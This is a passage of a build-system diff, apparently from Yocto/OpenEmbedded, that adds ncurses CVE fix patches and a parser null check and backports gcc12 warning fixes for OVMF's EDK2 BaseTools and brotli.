28@@ -142,6 +142,11 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
29 for (last = (unsigned) (max - 1); last > tindex; last--)
30
31 if (!found) {
32+ char *saved;
33+
34+ if ((saved = _nc_save_str(name)) == NULL)
35+ return NULL;
36+
37 switch (token_type) {
38 case BOOLEAN:
39 tp->ext_Booleans++;
40@@ -169,7 +174,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
41 TYPE_REALLOC(char *, actual, tp->ext_Names);
42 while (--actual > offset)
43 tp->ext_Names[actual] = tp->ext_Names[actual - 1];
44- tp->ext_Names[offset] = _nc_save_str(name);
45+ tp->ext_Names[offset] = saved;
46 }
47
48 temp.nte_name = tp->ext_Names[offset];
49@@ -337,6 +342,8 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
50 bool is_use = (strcmp(_nc_curr_token.tk_name, "use") == 0);
51 bool is_tc = !is_use && (strcmp(_nc_curr_token.tk_name, "tc") == 0);
52 if (is_use || is_tc) {
53+ char *saved;
54+
55 if (!VALID_STRING(_nc_curr_token.tk_valstring)
56 || _nc_curr_token.tk_valstring[0] == '\0') {
57 _nc_warning("missing name for use-clause");
58@@ -350,11 +357,13 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
59 _nc_curr_token.tk_valstring);
60 continue;
61 }
62- entryp->uses[entryp->nuses].name = _nc_save_str(_nc_curr_token.tk_valstring);
63- entryp->uses[entryp->nuses].line = _nc_curr_line;
64- entryp->nuses++;
65- if (entryp->nuses > 1 && is_tc) {
66- BAD_TC_USAGE
67+ if ((saved = _nc_save_str(_nc_curr_token.tk_valstring)) != NULL) {
68+ entryp->uses[entryp->nuses].name = saved;
69+ entryp->uses[entryp->nuses].line = _nc_curr_line;
70+ entryp->nuses++;
71+ if (entryp->nuses > 1 && is_tc) {
72+ BAD_TC_USAGE
73+ }
74 }
75 } else {
76 /* normal token lookup */
77--
782.25.1
79
diff --git a/meta/recipes-core/ncurses/ncurses.inc b/meta/recipes-core/ncurses/ncurses.inc
index 7f1834f0dc..ee0b15ecf0 100644
--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,7 +13,7 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
13inherit autotools binconfig-disabled multilib_header pkgconfig 13inherit autotools binconfig-disabled multilib_header pkgconfig
14 14
15# Upstream has useful patches at times at ftp://invisible-island.net/ncurses/ 15# Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
16SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https" 16SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
17 17
18EXTRA_AUTORECONF = "-I m4" 18EXTRA_AUTORECONF = "-I m4"
19 19
diff --git a/meta/recipes-core/ncurses/ncurses_6.2.bb b/meta/recipes-core/ncurses/ncurses_6.2.bb
index 76f0cf97f4..dbff149f55 100644
--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -3,11 +3,15 @@ require ncurses.inc
3SRC_URI += "file://0001-tic-hang.patch \ 3SRC_URI += "file://0001-tic-hang.patch \
4 file://0002-configure-reproducible.patch \ 4 file://0002-configure-reproducible.patch \
5 file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \ 5 file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
6 file://CVE-2021-39537.patch \
7 file://CVE-2022-29458.patch \
8 file://CVE-2023-29491.patch \
9 file://CVE-2023-50495.patch \
6 " 10 "
7# commit id corresponds to the revision in package version 11# commit id corresponds to the revision in package version
8SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4" 12SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
9S = "${WORKDIR}/git" 13S = "${WORKDIR}/git"
10EXTRA_OECONF += "--with-abi-version=5" 14EXTRA_OECONF += "--with-abi-version=5 --disable-root-environ"
11UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)" 15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)"
12 16
13# This is needed when using patchlevel versions like 6.1+20181013 17# This is needed when using patchlevel versions like 6.1+20181013
diff --git a/meta/recipes-core/os-release/os-release.bb b/meta/recipes-core/os-release/os-release.bb
index a29d678125..33f75e39b8 100644
--- a/meta/recipes-core/os-release/os-release.bb
+++ b/meta/recipes-core/os-release/os-release.bb
@@ -12,7 +12,9 @@ do_configure[noexec] = "1"
12 12
13# Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME 13# Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME
14# HOME_URL SUPPORT_URL BUG_REPORT_URL 14# HOME_URL SUPPORT_URL BUG_REPORT_URL
15OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME" 15OS_RELEASE_FIELDS = "\
16 ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \
17"
16OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID" 18OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID"
17 19
18ID = "${DISTRO}" 20ID = "${DISTRO}"
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..4418d52898
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
@@ -0,0 +1,49 @@
1From 7b005f344e533cd913c3ca05b266f9872df886d1 Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Thu, 24 Mar 2022 20:04:34 +0800
4Subject: [PATCH] BaseTools: fix gcc12 warning
5
6GenFfs.c:545:5: error: pointer ?InFileHandle? used after ?fclose? [-Werror=use-after-free]
7 545 | Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
8 | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
9GenFfs.c:544:5: note: call to ?fclose? here
10 544 | fclose (InFileHandle);
11 | ^~~~~~~~~~~~~~~~~~~~~
12
13Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
14Reviewed-by: Bob Feng <bob.c.feng@intel.com>
15
16Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/7b005f344e533cd913c3ca05b266f9872df886d1]
17Signed-off-by: Steve Sakoman <steve@sakoman.com>
18
19---
20 BaseTools/Source/C/GenFfs/GenFfs.c | 2 +-
21 BaseTools/Source/C/GenSec/GenSec.c | 2 +-
22 2 files changed, 2 insertions(+), 2 deletions(-)
23
24diff --git a/BaseTools/Source/C/GenFfs/GenFfs.c b/BaseTools/Source/C/GenFfs/GenFfs.c
25index 949025c33325..d78d62ab3689 100644
26--- a/BaseTools/Source/C/GenFfs/GenFfs.c
27+++ b/BaseTools/Source/C/GenFfs/GenFfs.c
28@@ -542,7 +542,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
29 PeFileBuffer = (UINT8 *) malloc (PeFileSize);
30 if (PeFileBuffer == NULL) {
31 fclose (InFileHandle);
32- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
33+ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
34 return EFI_OUT_OF_RESOURCES;
35 }
36 fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
37diff --git a/BaseTools/Source/C/GenSec/GenSec.c b/BaseTools/Source/C/GenSec/GenSec.c
38index d54a4f9e0a7d..b1d05367ec0b 100644
39--- a/BaseTools/Source/C/GenSec/GenSec.c
40+++ b/BaseTools/Source/C/GenSec/GenSec.c
41@@ -1062,7 +1062,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
42 PeFileBuffer = (UINT8 *) malloc (PeFileSize);
43 if (PeFileBuffer == NULL) {
44 fclose (InFileHandle);
45- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
46+ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
47 return EFI_OUT_OF_RESOURCES;
48 }
49 fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..a6ef87aa79
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
@@ -0,0 +1,53 @@
1From 24551a99d1f765c891a4dc21a36f18ccbf56e612 Mon Sep 17 00:00:00 2001
2From: Steve Sakoman <steve@sakoman.com>
3Date: Tue, 10 Jan 2023 06:15:00 -1000
4Subject: [PATCH] BaseTools: fix gcc12 warning
5
6Sdk/C/LzmaEnc.c: In function ?LzmaEnc_CodeOneMemBlock?:
7Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*p.rc.outStream? [-Werror=dangling-pointer=]
8 2828 | p->rc.outStream = &outStream.vt;
9 | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
10Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
11 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
12 | ^~~~~~~~~
13Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
14Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*(CLzmaEnc *)pp.rc.outStream? [-Werror=dangling-pointer=]
15 2828 | p->rc.outStream = &outStream.vt;
16 | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
17Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
18 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
19 | ^~~~~~~~~
20Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
21cc1: all warnings being treated as errors
22
23Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
24Reviewed-by: Bob Feng <bob.c.feng@intel.com>
25
26Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/85021f8cf22d1bd4114803c6c610dea5ef0059f1]
27Signed-off-by: Steve Sakoman <steve@sakoman.com>
28---
29 BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c | 3 ++-
30 1 file changed, 2 insertions(+), 1 deletion(-)
31
32diff --git a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
33index e281716fee..b575c4f888 100644
34--- a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
35+++ b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
36@@ -2638,12 +2638,13 @@ SRes LzmaEnc_CodeOneMemBlock(CLzmaEncHandle pp, Bool reInit,
37
38 nowPos64 = p->nowPos64;
39 RangeEnc_Init(&p->rc);
40- p->rc.outStream = &outStream.vt;
41
42 if (desiredPackSize == 0)
43 return SZ_ERROR_OUTPUT_EOF;
44
45+ p->rc.outStream = &outStream.vt;
46 res = LzmaEnc_CodeOneBlock(p, desiredPackSize, *unpackSize);
47+ p->rc.outStream = NULL;
48
49 *unpackSize = (UInt32)(p->nowPos64 - nowPos64);
50 *destLen -= outStream.rem;
51--
522.25.1
53
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
new file mode 100644
index 0000000000..73a432684c
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
@@ -0,0 +1,41 @@
1From 22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Thu, 24 Mar 2022 20:04:36 +0800
4Subject: [PATCH] Basetools: turn off gcc12 warning
5
6In function ?SetDevicePathEndNode?,
7 inlined from ?FileDevicePath? at DevicePathUtilities.c:857:5:
8DevicePathUtilities.c:321:3: error: writing 4 bytes into a region of size 1 [-Werror=stringop-overflow=]
9 321 | memcpy (Node, &mUefiDevicePathLibEndDevicePath, sizeof (mUefiDevicePathLibEndDevicePath));
10 | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
11In file included from UefiDevicePathLib.h:22,
12 from DevicePathUtilities.c:16:
13../Include/Protocol/DevicePath.h: In function ?FileDevicePath?:
14../Include/Protocol/DevicePath.h:51:9: note: destination object ?Type? of size 1
15 51 | UINT8 Type; ///< 0x01 Hardware Device Path.
16 | ^~~~
17
18Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
19Reviewed-by: Bob Feng <bob.c.feng@intel.com>
20
21Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c]
22Signed-off-by: Steve Sakoman <steve@sakoman.com>
23
24---
25 BaseTools/Source/C/DevicePath/GNUmakefile | 3 +++
26 1 file changed, 3 insertions(+)
27
28diff --git a/BaseTools/Source/C/DevicePath/GNUmakefile b/BaseTools/Source/C/DevicePath/GNUmakefile
29index 7ca08af9662d..b05d2bddfa68 100644
30--- a/BaseTools/Source/C/DevicePath/GNUmakefile
31+++ b/BaseTools/Source/C/DevicePath/GNUmakefile
32@@ -13,6 +13,9 @@ OBJECTS = DevicePath.o UefiDevicePathLib.o DevicePathFromText.o DevicePathUtili
33
34 include $(MAKEROOT)/Makefiles/app.makefile
35
36+# gcc 12 trips over device path handling
37+BUILD_CFLAGS += -Wno-error=stringop-overflow
38+
39 LIBS = -lCommon
40 ifeq ($(CYGWIN), CYGWIN)
41 LIBS += -L/lib/e2fsprogs -luuid
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
new file mode 100644
index 0000000000..d658123b81
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
1From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
2From: Adrian Herrera <adr.her.arc.95@gmail.com>
3Date: Mon, 22 Mar 2021 21:06:47 +0000
4Subject: [PATCH] Fix VLA parameter warning
5
6Make VLA buffer types consistent in declarations and definitions.
7Resolves build crash when using -Werror due to "vla-parameter" warning.
8
9Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
10Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
11---
12 c/dec/decode.c | 6 ++++--
13 c/enc/encode.c | 5 +++--
14 2 files changed, 7 insertions(+), 4 deletions(-)
15
16diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
17index 114c505..bb6f1ab 100644
18--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
19+++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
20@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
21 }
22
23 BrotliDecoderResult BrotliDecoderDecompress(
24- size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
25- uint8_t* decoded_buffer) {
26+ size_t encoded_size,
27+ const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
28+ size_t* decoded_size,
29+ uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
30 BrotliDecoderState s;
31 BrotliDecoderResult result;
32 size_t total_out = 0;
33diff --git a/c/enc/encode.c b/c/enc/encode.c
34index 68548ef..ab0a490 100644
35--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
36+++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
37@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
38
39 BROTLI_BOOL BrotliEncoderCompress(
40 int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
41- const uint8_t* input_buffer, size_t* encoded_size,
42- uint8_t* encoded_buffer) {
43+ const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
44+ size_t* encoded_size,
45+ uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
46 BrotliEncoderState* s;
47 size_t out_size = *encoded_size;
48 const uint8_t* input_start = input_buffer;
49--
502.31.1
51
diff --git a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
index 6ecb23b29f..c32963a807 100644
--- a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
+++ b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
@@ -1,7 +1,7 @@
1From 0a8362cfb9f00870d70687475665b131dd82c947 Mon Sep 17 00:00:00 2001 1From 200ff35c6545b4ab85f5ea7a6096fbaec3d82f6d Mon Sep 17 00:00:00 2001
2From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com> 2From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
3Date: Thu, 9 Jun 2016 02:23:01 -0700 3Date: Thu, 9 Jun 2016 02:23:01 -0700
4Subject: [PATCH 1/5] ovmf: update path to native BaseTools 4Subject: [PATCH 1/4] ovmf: update path to native BaseTools
5 5
6BaseTools is a set of utilities to build EDK-based firmware. These utilities 6BaseTools is a set of utilities to build EDK-based firmware. These utilities
7are used during the build process. Thus, they need to be built natively. 7are used during the build process. Thus, they need to be built natively.
@@ -30,5 +30,5 @@ index 91b1442ade..1858dae31a 100755
30 source edksetup.sh BaseTools 30 source edksetup.sh BaseTools
31 else 31 else
32-- 32--
332.17.1 332.28.0
34 34
diff --git a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
index f37ed018ab..c61a08f022 100644
--- a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
+++ b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
@@ -1,7 +1,7 @@
1From a8bceaec1b16fffbf6810df05503d8ae9092b735 Mon Sep 17 00:00:00 2001 1From 667c0cf97dadc4f5994d26ec3984f559a05ec406 Mon Sep 17 00:00:00 2001
2From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com> 2From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
3Date: Fri, 26 Jul 2019 17:34:26 -0400 3Date: Fri, 26 Jul 2019 17:34:26 -0400
4Subject: [PATCH 2/5] BaseTools: makefile: adjust to build in under bitbake 4Subject: [PATCH 2/4] BaseTools: makefile: adjust to build in under bitbake
5 5
6Prepend the build flags with those of bitbake. This is to build 6Prepend the build flags with those of bitbake. This is to build
7using the bitbake native sysroot include and library directories. 7using the bitbake native sysroot include and library directories.
@@ -10,14 +10,14 @@ Signed-off-by: Ricardo Neri <ricardo.neri@linux.intel.com>
10Upstream-Status: Pending 10Upstream-Status: Pending
11 11
12--- 12---
13 BaseTools/Source/C/Makefiles/header.makefile | 10 +++++----- 13 BaseTools/Source/C/Makefiles/header.makefile | 17 +++++++++--------
14 1 file changed, 5 insertions(+), 5 deletions(-) 14 1 file changed, 9 insertions(+), 8 deletions(-)
15 15
16diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile 16diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile
17index 4e9b36d98b..eb03ee33fa 100644 17index 1c105ee7d4..d5eea3864e 100644
18--- a/BaseTools/Source/C/Makefiles/header.makefile 18--- a/BaseTools/Source/C/Makefiles/header.makefile
19+++ b/BaseTools/Source/C/Makefiles/header.makefile 19+++ b/BaseTools/Source/C/Makefiles/header.makefile
20@@ -62,23 +62,23 @@ $(error Bad HOST_ARCH) 20@@ -69,35 +69,36 @@ $(error Bad HOST_ARCH)
21 endif 21 endif
22 22
23 INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE) 23 INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE)
@@ -33,19 +33,35 @@ index 4e9b36d98b..eb03ee33fa 100644
33+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \ 33+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \
34 -Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g 34 -Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g
35 else 35 else
36 ifeq ($(CXX), llvm)
37-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
38+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
39 -fno-delete-null-pointer-checks -Wall -Werror \
40 -Wno-deprecated-declarations -Wno-self-assign \
41 -Wno-unused-result -nostdlib -g
42 else
36-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \ 43-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
37+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \ 44+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
38 -fno-delete-null-pointer-checks -Wall -Werror \ 45 -fno-delete-null-pointer-checks -Wall -Werror \
39 -Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \ 46 -Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \
40 -Wno-unused-result -nostdlib -g 47 -Wno-unused-result -nostdlib -g
41 endif 48 endif
49 endif
50 ifeq ($(CXX), llvm)
51-BUILD_LFLAGS =
52-BUILD_CXXFLAGS = -Wno-deprecated-register -Wno-unused-result
53+BUILD_LFLAGS = $(LDFLAGS)
54+BUILD_CXXFLAGS += -Wno-deprecated-register -Wno-unused-result
55 else
42-BUILD_LFLAGS = 56-BUILD_LFLAGS =
43-BUILD_CXXFLAGS = -Wno-unused-result 57-BUILD_CXXFLAGS = -Wno-unused-result
44+BUILD_LFLAGS = $(LDFLAGS) 58+BUILD_LFLAGS = $(LDFLAGS)
45+BUILD_CXXFLAGS += -Wno-unused-result 59+BUILD_CXXFLAGS += -Wno-unused-result
46 60 endif
61+
47 ifeq ($(HOST_ARCH), IA32) 62 ifeq ($(HOST_ARCH), IA32)
48 # 63 #
64 # Snow Leopard is a 32-bit and 64-bit environment. uname -m returns i386, but gcc defaults
49-- 65--
502.17.1 662.28.0
51 67
diff --git a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
index ab1e7db31f..df1d159011 100644
--- a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
+++ b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
@@ -1,7 +1,7 @@
1From 60a5f953f747e1e9e05a40157b651cba8ea57b91 Mon Sep 17 00:00:00 2001 1From e19481e5a64f8915ac118899b10c40d12c0f9daa Mon Sep 17 00:00:00 2001
2From: Dengke Du <dengke.du@windriver.com> 2From: Dengke Du <dengke.du@windriver.com>
3Date: Mon, 11 Sep 2017 02:21:55 -0400 3Date: Mon, 11 Sep 2017 02:21:55 -0400
4Subject: [PATCH 3/5] ovmf: enable long path file 4Subject: [PATCH 3/4] ovmf: enable long path file
5 5
6Upstream-Status: Pending 6Upstream-Status: Pending
7Signed-off-by: Dengke Du <dengke.du@windriver.com> 7Signed-off-by: Dengke Du <dengke.du@windriver.com>
@@ -24,5 +24,5 @@ index e1cce985f7..d67d03c70c 100644
24 #define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL) 24 #define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL)
25 #define MAX_UINT32 ((UINT32)0xFFFFFFFF) 25 #define MAX_UINT32 ((UINT32)0xFFFFFFFF)
26-- 26--
272.17.1 272.28.0
28 28
diff --git a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
index c10a39d95d..128438b201 100644
--- a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
+++ b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
@@ -1,7 +1,7 @@
1From 94eff316b31b4d0348af28c77be5c00bc09fe8e7 Mon Sep 17 00:00:00 2001 1From ad06fcf1e08736e79221cd6863ff2e3c9254f261 Mon Sep 17 00:00:00 2001
2From: Steve Langasek <steve.langasek@ubuntu.com> 2From: Steve Langasek <steve.langasek@ubuntu.com>
3Date: Sat, 10 Jun 2017 01:39:36 -0700 3Date: Sat, 10 Jun 2017 01:39:36 -0700
4Subject: [PATCH 4/5] ovmf: Update to latest 4Subject: [PATCH 4/4] ovmf: Update to latest
5 5
6Description: pass -fno-stack-protector to all GCC toolchains 6Description: pass -fno-stack-protector to all GCC toolchains
7 The upstream build rules inexplicably pass -fno-stack-protector only 7 The upstream build rules inexplicably pass -fno-stack-protector only
@@ -15,15 +15,15 @@ Upstream-Status: Pending
15 1 file changed, 4 insertions(+), 4 deletions(-) 15 1 file changed, 4 insertions(+), 4 deletions(-)
16 16
17diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template 17diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template
18index ca0b122dbb..b0066c2ab8 100755 18index 933b3160fd..c2fbbf0c38 100755
19--- a/BaseTools/Conf/tools_def.template 19--- a/BaseTools/Conf/tools_def.template
20+++ b/BaseTools/Conf/tools_def.template 20+++ b/BaseTools/Conf/tools_def.template
21@@ -1941,10 +1941,10 @@ DEFINE GCC_X64_RC_FLAGS = -I binary -O elf64-x86-64 -B i386 21@@ -1952,10 +1952,10 @@ DEFINE GCC_RISCV64_RC_FLAGS = -I binary -O elf64-littleriscv -B riscv
22 DEFINE GCC_ARM_RC_FLAGS = -I binary -O elf32-littlearm -B arm --rename-section .data=.hii 22 # GCC Build Flag for included header file list generation
23 DEFINE GCC_AARCH64_RC_FLAGS = -I binary -O elf64-littleaarch64 -B aarch64 --rename-section .data=.hii 23 DEFINE GCC_DEPS_FLAGS = -MMD -MF $@.deps
24 24
25-DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings 25-DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
26+DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -fno-stack-protector -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings 26+DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -fno-stack-protector -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
27 DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20 27 DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20
28-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address 28-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address
